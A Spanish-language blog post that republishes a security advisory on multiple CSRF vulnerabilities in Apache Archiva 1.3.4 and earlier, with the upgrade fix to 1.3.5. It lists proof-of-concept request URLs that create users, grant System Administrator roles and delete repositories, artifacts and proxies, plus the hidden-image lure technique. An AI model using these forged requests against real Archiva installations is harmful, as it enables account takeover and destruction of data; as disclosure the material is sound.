Otra Vulnerabilidad en Apache

 

Noticias, Updates, de Seguridad

#Apache #Archiva Multiple #CSRF #vulnerabil​ities

Esto es con respecto a múltiples CSRF (Cross Site Request Forgery) Vulnerabilidades en Apache Archiva 1.3.4 (y versiones anteriores).
Proyecto: Archiva Apache
Severidad: Alta
Versiones: 1.3.0 – 1.3.4. Las versiones no compatibles Archiva 1.0 – 1.2.2
también se ven afectados.
Tipo Exploit: Múltiples CSRF
Mitigación: Archiva 1.3.4 y anteriores usuarios deben actualizar a 1.3.5
Dirección del vendedor: http://archiva.apache.org/security.html
CVE: CVE-ID-2011-1026

Detalles de la vulnerabilidad:
Estos aspectos permiten a un atacante acceder y utilizar la aplicación con la sesión de un usuario con sesión iniciada. En este caso, un atacante puede construir una simple página HTML que contiene una imagen oculta con etiquetas
(por ejemplo: src=vulnurl <img width=0 height=0 />) y atraer al administrador
para acceder a la página y robar su identidad.

http://127.0.0.1:8080/archiva/security/usercreate!submit.action?user.username=tester123&user.fullName=test&user.email=test%40test.com&user.password=abc&user.confirmPassword=abchttp://127.0.0.1:8080/archiva/security/userdelete!submit.action?username=test

http://127.0.0.1:8080/archiva/security/addRolesToUser.action?principal=test&addRolesButton=true&__checkbox_addNDSelectedRoles=Guest&__checkbox_addNDSelectedRoles=Registered+User&addNDSelectedRoles=System+Administrator&__checkbox_addNDSelectedRoles=System+Administrator&__checkbox_addNDSelectedRoles=User+Administrator&__checkbox_addNDSelectedRoles=Global+Repository+Manager&__checkbox_addNDSelectedRoles=Global+Repository+Observer&submitRolesButton=Submit

http://127.0.0.1:8080/archiva/admin/deleteRepository.action?repoid=test&method%3AdeleteContents=Delete+Configuration+and+Contents

http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&artifactId=1&version=1&repositoryId=snapshots

http://127.0.0.1:8080/archiva/admin/addRepositoryGroup.action?repositoryGroup.id=csrfgrp

http://127.0.0.1:8080/archiva/admin/deleteRepositoryGroup.action?repoGroupId=test&method%3Adelete=Confirm

http://127.0.0.1:8080/archiva/admin/disableProxyConnector!disable.action?target=maven2-repository.dev.java.net&source=internal

http://127.0.0.1:8080/archiva/admin/deleteProxyConnector!delete.action?target=maven2-repository.dev.java.net&source=snapshots

http://127.0.0.1:8080/archiva/admin/deleteLegacyArtifactPath.action?path=jaxen%2Fjars%2Fjaxen-1.0-FCS-full.jar

http://127.0.0.1:8080/archiva/admin/saveNetworkProxy.action?mode=add&proxy.id=ntwrk&proxy.protocol=http&proxy.host=test&proxy.port=8080&proxy.username=&proxy.password=

http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!delete.action?proxyid=myproxy

http://127.0.0.1:8080/archiva/admin/repositoryScanning!addFiletypePattern.action?pattern=**%2F*.rum&fileTypeId=artifacts

http://127.0.0.1:8080/archiva/admin/repositoryScanning!removeFiletypePattern.action?pattern=**%2F*.rum&fileTypeId=artifacts

http://127.0.0.1:8080/archiva/admin/repositoryScanning!updateKnownConsumers.action?enabledKnownContentConsumers=auto-remove&enabledKnownContentConsumers=auto-rename&enabledKnownContentConsumers=create-missing-checksums&enabledKnownContentConsumers=index-content&enabledKnownContentConsume

rs=metadata-updater&enabledKnownContentConsumers=repository-purge&enabledKnownContentConsumers=update-db-artifact&enabledKnownContentConsumers=validate-checksums

http://127.0.0.1:8080/archiva/admin/database!updateUnprocessedConsumers.action?enabledUnprocessedConsumers=update-db-project

http://127.0.0.1:8080/archiva/admin/database!updateCleanupConsumers.action?enabledCleanupConsumers=not-present-remove-db-artifact&enabledCleanupConsumers=not-present-remove-db-project&enabledCleanupConsumers=not-present-remove-indexed

Reciban un cordial Saludo.

Comparte este Post:

Tags: , , , , ,

Professional Ethical Hacker, Pentester & Forensics Investigator MPCS, CEH v8, CSSP, CICP-CICAP HTCIA Member & ISECOM Member Twitter: @victormirandamx

Deja un comentario





September 2019
M T W T F S S
« Oct    
 1
2345678
9101112131415
16171819202122
23242526272829
30  
wordpress visitors